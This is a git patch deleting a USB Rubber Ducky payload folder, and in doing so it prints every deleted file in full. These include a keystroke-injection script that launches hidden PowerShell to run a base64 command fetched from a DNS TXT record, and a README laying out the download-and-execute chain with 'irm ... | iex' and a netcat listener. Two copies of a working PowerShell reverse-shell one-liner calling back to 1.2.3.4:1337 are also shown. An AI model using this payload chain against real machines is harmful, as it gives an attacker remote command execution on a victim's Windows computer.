From c8e0ac280b73039c53a273020c95304821893d95 Mon Sep 17 00:00:00 2001
From: Nate <101878955+nathansb2022@users.noreply.github.com>
Date: Sun, 4 Aug 2024 14:29:33 -0500
Subject: [PATCH] Delete payloads/library/execution/DNS-TXT-CommandInjection directory

deleting and removing files from requested changes in Pull request
---
 .../DNS-TXT-CommandInjection/.gitignore | 175 ------------------
 .../ConvertBase64.ps1 | 3 -
 .../DNS-TXT-CommandInjection.txt | 38 ----
 .../DNS-TXT-CommandInjection/README.md | 49 -----
 .../execution/DNS-TXT-CommandInjection/T1.txt | 5 -
 .../powershellReverseShellOne-liner.ps1 | 5 -
 6 files changed, 275 deletions(-)
 delete mode 100644 payloads/library/execution/DNS-TXT-CommandInjection/.gitignore
 delete mode 100644 payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1
 delete mode 100644 payloads/library/execution/DNS-TXT-CommandInjection/DNS-TXT-CommandInjection.txt
 delete mode 100644 payloads/library/execution/DNS-TXT-CommandInjection/README.md
 delete mode 100644 payloads/library/execution/DNS-TXT-CommandInjection/T1.txt
 delete mode 100644 payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1
diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/.gitignore b/payloads/library/execution/DNS-TXT-CommandInjection/.gitignore
deleted file mode 100644
index cec8300..0000000
--- a/payloads/library/execution/DNS-TXT-CommandInjection/.gitignore
+++ /dev/null
@@ -1,175 +0,0 @@
-# VSCode
-.vscode/*
-!.vscode/settings.json
-!.vscode/tasks.json
-!.vscode/launch.json
-!.vscode/extensions.json
-*.code-workspace
-# Local History for Visual Studio Code
-.history/
-
-# Common credential files
-**/credentials.json
-**/client_secrets.json
-**/client_secret.json
-*creds*
-*.dat
-*password*
-*.httr-oauth*
-
-# Private Node Modules
-node_modules/
-creds.js
-
-# Private Files
-*.json
-*.csv
-*.csv.gz
-*.tsv
-*.tsv.gz
-*.xlsx
-
-
-# Mac/OSX
-.DS_Store
-
-
-# Byte-compiled / optimized / DLL files
-__pycache__/
-*.py[cod]
-*$py.class
-
-# C extensions
-*.so
-
-# Distribution / packaging
-.Python
-build/
-develop-eggs/
-dist/
-downloads/
-eggs/
-.eggs/
-lib/
-lib64/
-parts/
-sdist/
-var/
-wheels/
-share/python-wheels/
-*.egg-info/
-.installed.cfg
-*.egg
-MANIFEST
-
-# PyInstaller
-# Usually these files are written by a python script from a template
-# before PyInstaller builds the exe, so as to inject date/other infos into it.
-*.manifest
-*.spec
-
-# Installer logs
-pip-log.txt
-pip-delete-this-directory.txt
-
-# Unit test / coverage reports
-htmlcov/
-.tox/
-.nox/
-.coverage
-.coverage.*
-.cache
-nosetests.xml
-coverage.xml
-*.cover
-*.py,cover
-.hypothesis/
-.pytest_cache/
-cover/
-
-# Translations
-*.mo
-*.pot
-
-# Django stuff:
-*.log
-local_settings.py
-db.sqlite3
-db.sqlite3-journal
-
-# Flask stuff:
-instance/
-.webassets-cache
-
-# Scrapy stuff:
-.scrapy
-
-# Sphinx documentation
-docs/_build/
-
-# PyBuilder
-.pybuilder/
-target/
-
-# Jupyter Notebook
-.ipynb_checkpoints
-
-# IPython
-profile_default/
-ipython_config.py
-
-# pyenv
-# For a library or package, you might want to ignore these files since the code is
-# intended to run in multiple environments; otherwise, check them in:
-# .python-version
-
-# pipenv
-# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
-# However, in case of collaboration, if having platform-specific dependencies or dependencies
-# having no cross-platform support, pipenv may install dependencies that don't work, or not
-# install all needed dependencies.
-#Pipfile.lock
-
-# PEP 582; used by e.g. github.com/David-OConnor/pyflow
-__pypackages__/
-
-# Celery stuff
-celerybeat-schedule
-celerybeat.pid
-
-# SageMath parsed files
-*.sage.py
-
-# Environments
-.env
-.venv
-env/
-venv/
-ENV/
-env.bak/
-venv.bak/
-
-# Spyder project settings
-.spyderproject
-.spyproject
-
-# Rope project settings
-.ropeproject
-
-# mkdocs documentation
-/site
-
-# mypy
-.mypy_cache/
-.dmypy.json
-dmypy.json
-
-# Pyre type checker
-.pyre/
-
-# pytype static type analyzer
-.pytype/
-
-# Cython debug symbols
-cython_debug/
-
diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1 b/payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1
deleted file mode 100644
index ffdb8dd..0000000
--- a/payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1
+++ /dev/null
@@ -1,3 +0,0 @@
-$text = Read-Host -prompt "What would you like to encode"
-$base64Text = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($text))
-echo $base64Text
diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/DNS-TXT-CommandInjection.txt b/payloads/library/execution/DNS-TXT-CommandInjection/DNS-TXT-CommandInjection.txt
deleted file mode 100644
index e772e00..0000000
--- a/payloads/library/execution/DNS-TXT-CommandInjection/DNS-TXT-CommandInjection.txt
+++ /dev/null
@@ -1,38 +0,0 @@
-REM Title: DNS-TXT-CommandInjection
-REM Author: Nate
-REM Description: A usb rubber ducky payload that leverages DNS TXT records to perform command injection.
-REM Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with
-REM the base64 encoded payload you have. See README.md for more details on converting your payload to base64
-REM and an example of creating your DNS TXT record in AWS Route53 service.
-REM Target: Windows 10, 11
-REM Props: Hak5, Darren Kitchen, Korben
-REM Version: 1.0
-REM Category: Execution
-
-REM CONFIGURATION
-REM REQUIRED A domain with the ability to manipulate the DNS TXT records.
-REM REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a
-REM reverseshell.
-REM REQUIRED A listener for incoming connections like netcat.
-REM REQUIRED - Provide URL used for Example
-DEFINE #MY_TARGET_URL example.com
-REM Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
-REM Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"
-
-REM NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
-REM for the STRING payload below. Examples of the decoded command and encoded command are shown below to put
-REM into DNS TXT record.
-REM Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
-REM Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
-
-REM ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
-REM https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
-REM The link below has the Powershell script to convert your payloads to Base64.
-REM https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1
-
-DELAY 1000
-GUI r
-DELAY 1000
-STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
-DELAY 500
-ENTER
diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/README.md b/payloads/library/execution/DNS-TXT-CommandInjection/README.md
deleted file mode 100644
index ddd6110..0000000
--- a/payloads/library/execution/DNS-TXT-CommandInjection/README.md
+++ /dev/null
@@ -1,49 +0,0 @@
-# DNS-TXT-CommandInjection
-Ducky Script uses Resolve-DnsName to perform a DNS name query resolution for a domain hosting a malicious TXT record.
-## Description
-A usb rubber ducky payload that leverages DNS TXT records to perform command injection. Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with the base64 encoded payload you have. See link below for an example of creating your DNS TXT record in AWS Route53 service.
-## Requirements
-A domain with the ability to manipulate the DNS TXT records.
-Web Server hosting the payload. In this example, python3 http.server was used to host a reverseshell.
-A listener for incoming connections like netcat.
-Provide URL used for Example
-DEFINE #MY_TARGET_URL example.com
-
-## Notes
-No base64 can be used as an option by replacing "$a=",";powershell -e $a" with just "|iex" for the STRING payload below. Examples of the decoded command and encoded command are shown below to put into DNS TXT record.
-Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
-Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
-powershellReverseShellOne-liner.ps1 is identical to T1.txt.
(file name shortened due to character limitations)
-## Windows Commands (used in payload)
-### Execute DNS TXT Payload
-```Powershell
-powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
-```
-### Execute web hosted Powershell Reverseshell
-```Powershell
-irm http://MY_TARGET_URL/T1.txt | iex
-```
-### [Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
-```Powershell
-.\powershellReverseShellOne-liner.ps1
-```
-### Convert payload to base64
-```Powershell
-.\convertBase64.ps1
-```
-### Alternative to executing Powershell Script
-```Powershell
-gc -raw .\convertBase64.ps1 | iex
-```
-## Linux Commands
-```bash
-nc -lvnp 1337
-```
-### Links
-
-[Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
-
-[Convert to base64](https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1)
-
-[Create TXT record in AWS Route53](https://www.entrust.com/knowledgebase/ssl/how-to-create-a-txt-record-on-amazon-aws-route-53-for-entrust-email-validation-method)
-
diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/T1.txt b/payloads/library/execution/DNS-TXT-CommandInjection/T1.txt
deleted file mode 100644
index f869dda..0000000
--- a/payloads/library/execution/DNS-TXT-CommandInjection/T1.txt
+++ /dev/null
@@ -1,5 +0,0 @@
-# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
-# CONFIGURATION
-# REQUIRED - Provide IP and Port used for Example
-# DEFINE #MY_TARGET_IP and Port after TCPClient(
-$client = New-Object System.Net.Sockets.TCPClient('1.2.3.4',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1 b/payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1
deleted file mode 100644
index f869dda..0000000
--- a/payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1
+++ /dev/null
@@ -1,5 +0,0 @@
-# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
-# CONFIGURATION
-# REQUIRED - Provide IP and Port used for Example
-# DEFINE #MY_TARGET_IP and Port after TCPClient(
-$client = New-Object System.Net.Sockets.TCPClient('1.2.3.4',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()